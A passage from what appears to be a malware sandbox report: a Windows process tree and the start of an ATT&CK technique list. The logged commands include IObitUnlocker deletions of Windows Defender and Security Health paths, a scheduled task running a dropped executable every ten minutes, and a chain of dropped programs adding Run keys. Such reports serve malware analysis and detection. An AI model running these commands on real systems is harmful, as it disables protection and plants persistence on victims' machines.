Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:2716
      - C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
        
        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetWindowsHookEx
        
        PID:2568
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c sc stop IObitUnlocker & sc delete IObitUnlocker
        6⤵
        
        PID:844
        
        C:\Windows\system32\sc.exe
        
        sc stop IObitUnlocker
        7⤵
        Launches sc.exe
        
        PID:1988
        
        C:\Windows\system32\sc.exe
        
        sc delete IObitUnlocker
        7⤵
        Launches sc.exe
        
        PID:1488
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /f /pid "1328"
        6⤵
        
        PID:4580
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:2580
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /pid "1328"
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2572
    - - C:\Users\Admin\AppData\Local\Temp\Work\Unlocker.exe
        
        Unlocker /newDiskSize
        5⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:112
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c sc query IObitUnlocker
        6⤵
        
        PID:2920
        
        C:\Windows\system32\sc.exe
        
        sc query IObitUnlocker
        7⤵
        Launches sc.exe
        
        PID:2036
    - - C:\Windows\SysWOW64\sc.exe
        
        sc start VMTools
        5⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:4556
    - - C:\Windows\SysWOW64\sc.exe
        
        sc start VMTools
        5⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:2620
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c schtasks /create /tn "23n1Q7ae2" /tr "C:\Temper\KrggRyL3.exe" /sc minute /mo 10 /ru "Admin" /f
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5056
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /tn "23n1Q7ae2" /tr "C:\Temper\KrggRyL3.exe" /sc minute /mo 10 /ru "Admin" /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:1632

C:\Users\Admin\AppData\Local\Temp\d610cf342e\ramez.exe
C:\Users\Admin\AppData\Local\Temp\d610cf342e\ramez.exe
1⤵
- Executes dropped EXE
PID:2260

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\"
1⤵
PID:512
- C:\Windows\system32\rundll32.exe
  rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\"
  2⤵
  PID:2724

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
1⤵
PID:3236

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\GoogleChrome.exe
1⤵
PID:4388
- C:\Users\Admin\AppData\Local\GoogleChrome.exe
  C:\Users\Admin\AppData\Local\GoogleChrome.exe
  2⤵
  - Checks BIOS information in registry
  PID:3500

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
1⤵
PID:1988

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:4012

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
1⤵
PID:3332

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:2608

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:2800

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:1984

C:\Users\Admin\AppData\Local\Temp\d610cf342e\ramez.exe
C:\Users\Admin\AppData\Local\Temp\d610cf342e\ramez.exe
1⤵
PID:5488

C:\Users\Admin\AppData\Local\Temp\0afeb9021a\nudwee.exe
C:\Users\Admin\AppData\Local\Temp\0afeb9021a\nudwee.exe
1⤵
- Drops startup file
PID:5404

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:6748

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\NUKKJONINQE\SVZOYU.exe
1⤵
PID:5232
- C:\Users\Admin\AppData\Local\Temp\NUKKJONINQE\SVZOYU.exe
  C:\Users\Admin\AppData\Local\Temp\NUKKJONINQE\SVZOYU.exe
  2⤵
  PID:6544
- - C:\Users\Admin\AppData\Local\Temp\IHDYSHSTEVV\POMRHO.exe
    C:\Users\Admin\AppData\Local\Temp\IHDYSHSTEVV\POMRHO.exe 6544
    3⤵
    - Drops startup file
    - Adds Run key to start application
    PID:6524

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\IHDYSHSTEVV\POMRHO.exe
1⤵
PID:6688
- C:\Users\Admin\AppData\Local\Temp\IHDYSHSTEVV\POMRHO.exe
  C:\Users\Admin\AppData\Local\Temp\IHDYSHSTEVV\POMRHO.exe
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5908
- - C:\Users\Admin\AppData\Local\Temp\YPEDQLEKNKH\OMOEUF.exe
    C:\Users\Admin\AppData\Local\Temp\YPEDQLEKNKH\OMOEUF.exe 5908
    3⤵
    - Drops startup file
    - Adds Run key to start application
    - System Location Discovery: System Language Discovery
    PID:6624

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\YPEDQLEKNKH\OMOEUF.exe
1⤵
PID:6676
- C:\Users\Admin\AppData\Local\Temp\YPEDQLEKNKH\OMOEUF.exe
  C:\Users\Admin\AppData\Local\Temp\YPEDQLEKNKH\OMOEUF.exe
  2⤵
  - System Location Discovery: System Language Discovery
  PID:6776
- - C:\Users\Admin\AppData\Local\Temp\GUOYHSOSYLM\JDPJZW.exe
    C:\Users\Admin\AppData\Local\Temp\GUOYHSOSYLM\JDPJZW.exe 6776
    3⤵
    - Drops startup file
    - Adds Run key to start application
    - System Location Discovery: System Language Discovery
    PID:6772

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\GUOYHSOSYLM\JDPJZW.exe
1⤵
PID:6812
- C:\Users\Admin\AppData\Local\Temp\GUOYHSOSYLM\JDPJZW.exe
  C:\Users\Admin\AppData\Local\Temp\GUOYHSOSYLM\JDPJZW.exe
  2⤵
  PID:4584
- - C:\Users\Admin\AppData\Local\Temp\QFZDYNRZIVF\OGKFZZ.exe
    C:\Users\Admin\AppData\Local\Temp\QFZDYNRZIVF\OGKFZZ.exe 4584
    3⤵
    - Drops startup file
    - Adds Run key to start application
    PID:3800

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\QFZDYNRZIVF\OGKFZZ.exe
1⤵
PID:4088
- C:\Users\Admin\AppData\Local\Temp\QFZDYNRZIVF\OGKFZZ.exe
  C:\Users\Admin\AppData\Local\Temp\QFZDYNRZIVF\OGKFZZ.exe
  2⤵
  PID:1496
- - C:\Users\Admin\AppData\Local\Temp\OFYGUKVQIFY\ODUDDN.exe
    C:\Users\Admin\AppData\Local\Temp\OFYGUKVQIFY\ODUDDN.exe 1496
    3⤵
    - Drops startup file
    - Adds Run key to start application
    PID:3408

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\OFYGUKVQIFY\ODUDDN.exe
1⤵
PID:4092
- C:\Users\Admin\AppData\Local\Temp\OFYGUKVQIFY\ODUDDN.exe
  C:\Users\Admin\AppData\Local\Temp\OFYGUKVQIFY\ODUDDN.exe
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5804
- - C:\Users\Admin\AppData\Local\Temp\UUMGKWFSSZY\DMNUZU.exe
    C:\Users\Admin\AppData\Local\Temp\UUMGKWFSSZY\DMNUZU.exe 5804
    3⤵
    - Adds Run key to start application
    PID:2088

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\UUMGKWFSSZY\DMNUZU.exe
1⤵
PID:6312
- C:\Users\Admin\AppData\Local\Temp\UUMGKWFSSZY\DMNUZU.exe
  C:\Users\Admin\AppData\Local\Temp\UUMGKWFSSZY\DMNUZU.exe
  2⤵
  PID:5796
- - C:\Users\Admin\AppData\Local\Temp\YYTTGNKTJOP\WYDPPL.exe
    C:\Users\Admin\AppData\Local\Temp\YYTTGNKTJOP\WYDPPL.exe 5796
    3⤵
    PID:2424

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\YYTTGNKTJOP\WYDPPL.exe
1⤵
PID:5160
- C:\Users\Admin\AppData\Local\Temp\YYTTGNKTJOP\WYDPPL.exe
  C:\Users\Admin\AppData\Local\Temp\YYTTGNKTJOP\WYDPPL.exe
  2⤵
  PID:2856
- - C:\Users\Admin\AppData\Local\Temp\FINOUZIMZIQ\RPISKQ.exe
    C:\Users\Admin\AppData\Local\Temp\FINOUZIMZIQ\RPISKQ.exe 2856
    3⤵
    PID:2404

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\FINOUZIMZIQ\RPISKQ.exe
1⤵
PID:6100
- C:\Users\Admin\AppData\Local\Temp\FINOUZIMZIQ\RPISKQ.exe
  C:\Users\Admin\AppData\Local\Temp\FINOUZIMZIQ\RPISKQ.exe
  2⤵
  PID:1752
- - C:\Users\Admin\AppData\Local\Temp\GUWDTNUZGDM\JUEMWO.exe
    C:\Users\Admin\AppData\Local\Temp\GUWDTNUZGDM\JUEMWO.exe 1752
    3⤵
    PID:4628

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\GUWDTNUZGDM\JUEMWO.exe
1⤵
PID:5312
- C:\Users\Admin\AppData\Local\Temp\GUWDTNUZGDM\JUEMWO.exe
  C:\Users\Admin\AppData\Local\Temp\GUWDTNUZGDM\JUEMWO.exe
  2⤵
  PID:6836
- - C:\Users\Admin\AppData\Local\Temp\ENSHYQHHGRZ\MMJHGU.exe
    C:\Users\Admin\AppData\Local\Temp\ENSHYQHHGRZ\MMJHGU.exe 6836
    3⤵
    PID:6868

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\ENSHYQHHGRZ\MMJHGU.exe
1⤵
PID:400
- C:\Users\Admin\AppData\Local\Temp\ENSHYQHHGRZ\MMJHGU.exe
  C:\Users\Admin\AppData\Local\Temp\ENSHYQHHGRZ\MMJHGU.exe
  2⤵
  PID:6412
- - C:\Users\Admin\AppData\Local\Temp\RXUPWNQFWLN\GYXVER.exe
    C:\Users\Admin\AppData\Local\Temp\RXUPWNQFWLN\GYXVER.exe 6412
    3⤵
    PID:6532

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\RXUPWNQFWLN\GYXVER.exe
1⤵
PID:5404
- C:\Users\Admin\AppData\Local\Temp\RXUPWNQFWLN\GYXVER.exe
  C:\Users\Admin\AppData\Local\Temp\RXUPWNQFWLN\GYXVER.exe
  2⤵
  PID:5292
- - C:\Users\Admin\AppData\Local\Temp\YXYYNNODZNL\MGEUEW.exe
    C:\Users\Admin\AppData\Local\Temp\YXYYNNODZNL\MGEUEW.exe 5292
    3⤵
    PID:5588

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\YXYYNNODZNL\MGEUEW.exe
1⤵
PID:7096
- C:\Users\Admin\AppData\Local\Temp\YXYYNNODZNL\MGEUEW.exe
  C:\Users\Admin\AppData\Local\Temp\YXYYNNODZNL\MGEUEW.exe
  2⤵
  PID:6744
- - C:\Users\Admin\AppData\Local\Temp\VERIKPGXZYN\JLVUFP.exe
    C:\Users\Admin\AppData\Local\Temp\VERIKPGXZYN\JLVUFP.exe 6744
    3⤵
    PID:1848

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\VERIKPGXZYN\JLVUFP.exe
1⤵
PID:5272
- C:\Users\Admin\AppData\Local\Temp\VERIKPGXZYN\JLVUFP.exe
  C:\Users\Admin\AppData\Local\Temp\VERIKPGXZYN\JLVUFP.exe
  2⤵
  PID:1964
- - C:\Users\Admin\AppData\Local\Temp\USLSWHFOITK\RLINWU.exe
    C:\Users\Admin\AppData\Local\Temp\USLSWHFOITK\RLINWU.exe 1964
    3⤵
    PID:5628

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\USLSWHFOITK\RLINWU.exe
1⤵
PID:5420
- C:\Users\Admin\AppData\Local\Temp\USLSWHFOITK\RLINWU.exe
  C:\Users\Admin\AppData\Local\Temp\USLSWHFOITK\RLINWU.exe
  2⤵
  PID:6180
- - C:\Users\Admin\AppData\Local\Temp\SJFSODDUWRT\SJHVID.exe
    C:\Users\Admin\AppData\Local\Temp\SJFSODDUWRT\SJHVID.exe 6180
    3⤵
    PID:5532

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\SJFSODDUWRT\SJHVID.exe
1⤵
PID:6388
- C:\Users\Admin\AppData\Local\Temp\SJFSODDUWRT\SJHVID.exe
  C:\Users\Admin\AppData\Local\Temp\SJFSODDUWRT\SJHVID.exe
  2⤵
  PID:6400
- - C:\Users\Admin\AppData\Local\Temp\OXSMFILQRZQ\RFPKHS.exe
    C:\Users\Admin\AppData\Local\Temp\OXSMFILQRZQ\RFPKHS.exe 6400
    3⤵
    PID:6436

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\OXSMFILQRZQ\RFPKHS.exe
1⤵
PID:6628
- C:\Users\Admin\AppData\Local\Temp\OXSMFILQRZQ\RFPKHS.exe
  C:\Users\Admin\AppData\Local\Temp\OXSMFILQRZQ\RFPKHS.exe
  2⤵
  PID:5684
- - C:\Users\Admin\AppData\Local\Temp\RNPXLSKKZXN\WXRYPT.exe
    C:\Users\Admin\AppData\Local\Temp\RNPXLSKKZXN\WXRYPT.exe 5684
    3⤵
    PID:3160

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\RNPXLSKKZXN\WXRYPT.exe
1⤵
PID:2628
- C:\Users\Admin\AppData\Local\Temp\RNPXLSKKZXN\WXRYPT.exe
  C:\Users\Admin\AppData\Local\Temp\RNPXLSKKZXN\WXRYPT.exe
  2⤵
  PID:5936
- - C:\Users\Admin\AppData\Local\Temp\GVOWXWVTVTX\ESDPEQ.exe
    C:\Users\Admin\AppData\Local\Temp\GVOWXWVTVTX\ESDPEQ.exe 5936
    3⤵
    PID:5992

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\GVOWXWVTVTX\ESDPEQ.exe
1⤵
PID:6280
- C:\Users\Admin\AppData\Local\Temp\GVOWXWVTVTX\ESDPEQ.exe
  C:\Users\Admin\AppData\Local\Temp\GVOWXWVTVTX\ESDPEQ.exe
  2⤵
  PID:5572
- - C:\Users\Admin\AppData\Local\Temp\NLXVKGZPSIJ\SIXZDK.exe
    C:\Users\Admin\AppData\Local\Temp\NLXVKGZPSIJ\SIXZDK.exe 5572
    3⤵
    PID:6160

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\NLXVKGZPSIJ\SIXZDK.exe
1⤵
PID:6164
- C:\Users\Admin\AppData\Local\Temp\NLXVKGZPSIJ\SIXZDK.exe
  C:\Users\Admin\AppData\Local\Temp\NLXVKGZPSIJ\SIXZDK.exe
  2⤵
  PID:5880
- - C:\Users\Admin\AppData\Local\Temp\OZEDUDOXXJG\WVWLSY.exe
    C:\Users\Admin\AppData\Local\Temp\OZEDUDOXXJG\WVWLSY.exe 5880
    3⤵
    PID:6364

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\OZEDUDOXXJG\WVWLSY.exe
1⤵
PID:2816
- C:\Users\Admin\AppData\Local\Temp\OZEDUDOXXJG\WVWLSY.exe
  C:\Users\Admin\AppData\Local\Temp\OZEDUDOXXJG\WVWLSY.exe
  2⤵
  PID:2260
- - C:\Users\Admin\AppData\Local\Temp\ZHWWHPWHERZ\ZWMYOT.exe
    C:\Users\Admin\AppData\Local\Temp\ZHWWHPWHERZ\ZWMYOT.exe 2260
    3⤵
    PID:6224

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\ProgramData\gdtrimy5xl.exe" ..
1⤵
PID:6380
- C:\ProgramData\gdtrimy5xl.exe
  C:\ProgramData\gdtrimy5xl.exe ..
  2⤵
  PID:2280

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\ZHWWHPWHERZ\ZWMYOT.exe
1⤵
PID:2916
- C:\Users\Admin\AppData\Local\Temp\ZHWWHPWHERZ\ZWMYOT.exe
  C:\Users\Admin\AppData\Local\Temp\ZHWWHPWHERZ\ZWMYOT.exe
  2⤵
  PID:5632
- - C:\Users\Admin\AppData\Local\Temp\JJQMRNFQUGD\QKYYKP.exe
    C:\Users\Admin\AppData\Local\Temp\JJQMRNFQUGD\QKYYKP.exe 5632
    3⤵
    PID:6820

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\JJQMRNFQUGD\QKYYKP.exe
1⤵
PID:2512
- C:\Users\Admin\AppData\Local\Temp\JJQMRNFQUGD\QKYYKP.exe
  C:\Users\Admin\AppData\Local\Temp\JJQMRNFQUGD\QKYYKP.exe
  2⤵
  PID:6872
- - C:\Users\Admin\AppData\Local\Temp\HFHIVETIPJT\HNPVFT.exe
    C:\Users\Admin\AppData\Local\Temp\HFHIVETIPJT\HNPVFT.exe 6872
    3⤵
    PID:4664

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\HFHIVETIPJT\HNPVFT.exe
1⤵
PID:5376
- C:\Users\Admin\AppData\Local\Temp\HFHIVETIPJT\HNPVFT.exe
  C:\Users\Admin\AppData\Local\Temp\HFHIVETIPJT\HNPVFT.exe
  2⤵
  PID:4176
- - C:\Users\Admin\AppData\Local\Temp\ITMPPVWSHZO\ZLEUTT.exe
    C:\Users\Admin\AppData\Local\Temp\ITMPPVWSHZO\ZLEUTT.exe 4176
    3⤵
    PID:1972

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\ITMPPVWSHZO\ZLEUTT.exe
1⤵
PID:7112
- C:\Users\Admin\AppData\Local\Temp\ITMPPVWSHZO\ZLEUTT.exe
  C:\Users\Admin\AppData\Local\Temp\ITMPPVWSHZO\ZLEUTT.exe
  2⤵
  PID:1604
- - C:\Users\Admin\AppData\Local\Temp\TQFTHUWPVFV\NJJNUT.exe
    C:\Users\Admin\AppData\Local\Temp\TQFTHUWPVFV\NJJNUT.exe 1604
    3⤵
    PID:6136

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TQFTHUWPVFV\NJJNUT.exe
1⤵
PID:1316
- C:\Users\Admin\AppData\Local\Temp\TQFTHUWPVFV\NJJNUT.exe
  C:\Users\Admin\AppData\Local\Temp\TQFTHUWPVFV\NJJNUT.exe
  2⤵
  PID:3804
- - C:\Users\Admin\AppData\Local\Temp\QPUGJJVITUE\VXDPFY.exe
    C:\Users\Admin\AppData\Local\Temp\QPUGJJVITUE\VXDPFY.exe 3804
    3⤵
    PID:5144

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\QPUGJJVITUE\VXDPFY.exe
1⤵
PID:2296
- C:\Users\Admin\AppData\Local\Temp\QPUGJJVITUE\VXDPFY.exe
  C:\Users\Admin\AppData\Local\Temp\QPUGJJVITUE\VXDPFY.exe
  2⤵
  PID:6768
- - C:\Users\Admin\AppData\Local\Temp\OQWMHZESOQQ\ZZHVKY.exe
    C:\Users\Admin\AppData\Local\Temp\OQWMHZESOQQ\ZZHVKY.exe 6768
    3⤵
    PID:6740

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\OQWMHZESOQQ\ZZHVKY.exe
1⤵
PID:3396
- C:\Users\Admin\AppData\Local\Temp\OQWMHZESOQQ\ZZHVKY.exe
  C:\Users\Admin\AppData\Local\Temp\OQWMHZESOQQ\ZZHVKY.exe
  2⤵
  PID:7580
- - C:\Users\Admin\AppData\Local\Temp\NWOEPXEZWXT\KLUFIG.exe
    C:\Users\Admin\AppData\Local\Temp\NWOEPXEZWXT\KLUFIG.exe 7580
    3⤵
    PID:7620

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\NWOEPXEZWXT\KLUFIG.exe
1⤵
PID:7800
- C:\Users\Admin\AppData\Local\Temp\NWOEPXEZWXT\KLUFIG.exe
  C:\Users\Admin\AppData\Local\Temp\NWOEPXEZWXT\KLUFIG.exe
  2⤵
  PID:7236
- - C:\Users\Admin\AppData\Local\Temp\VZVHPRWDOWX\YYRTMG.exe
    C:\Users\Admin\AppData\Local\Temp\VZVHPRWDOWX\YYRTMG.exe 7236
    3⤵
    PID:7272

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\VZVHPRWDOWX\YYRTMG.exe
1⤵
PID:7448
- C:\Users\Admin\AppData\Local\Temp\VZVHPRWDOWX\YYRTMG.exe
  C:\Users\Admin\AppData\Local\Temp\VZVHPRWDOWX\YYRTMG.exe
  2⤵
  PID:8092
- - C:\Users\Admin\AppData\Local\Temp\NKJXUSTPUJX\KRJHWD.exe
    C:\Users\Admin\AppData\Local\Temp\NKJXUSTPUJX\KRJHWD.exe 8092
    3⤵
    PID:4072

C:\Users\Admin\AppData\Local\Temp\d610cf342e\ramez.exe
C:\Users\Admin\AppData\Local\Temp\d610cf342e\ramez.exe
1⤵
PID:7928

C:\Users\Admin\AppData\Local\Temp\0afeb9021a\nudwee.exe
C:\Users\Admin\AppData\Local\Temp\0afeb9021a\nudwee.exe
1⤵
PID:8048

C:\Users\Admin\AppData\Local\Temp\Server.exe
C:\Users\Admin\AppData\Local\Temp/Server.exe
1⤵
PID:6528

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\NKJXUSTPUJX\KRJHWD.exe
1⤵
PID:7364
- C:\Users\Admin\AppData\Local\Temp\NKJXUSTPUJX\KRJHWD.exe
  C:\Users\Admin\AppData\Local\Temp\NKJXUSTPUJX\KRJHWD.exe
  2⤵
  PID:4916
- - C:\Users\Admin\AppData\Local\Temp\NYSRDQYLULL\RUDWLS.exe
    C:\Users\Admin\AppData\Local\Temp\NYSRDQYLULL\RUDWLS.exe 4916
    3⤵
    PID:7844

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\NYSRDQYLULL\RUDWLS.exe
1⤵
PID:3960
- C:\Users\Admin\AppData\Local\Temp\NYSRDQYLULL\RUDWLS.exe
  C:\Users\Admin\AppData\Local\Temp\NYSRDQYLULL\RUDWLS.exe
  2⤵
  PID:808
- - C:\Users\Admin\AppData\Local\Temp\NPMOSJKIVLP\IHJDOE.exe
    C:\Users\Admin\AppData\Local\Temp\NPMOSJKIVLP\IHJDOE.exe 808
    3⤵
    PID:448

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\NPMOSJKIVLP\IHJDOE.exe
1⤵
PID:4932

Network

MITRE ATT&CK Enterprise v16

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Modify Authentication Process

T1556

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

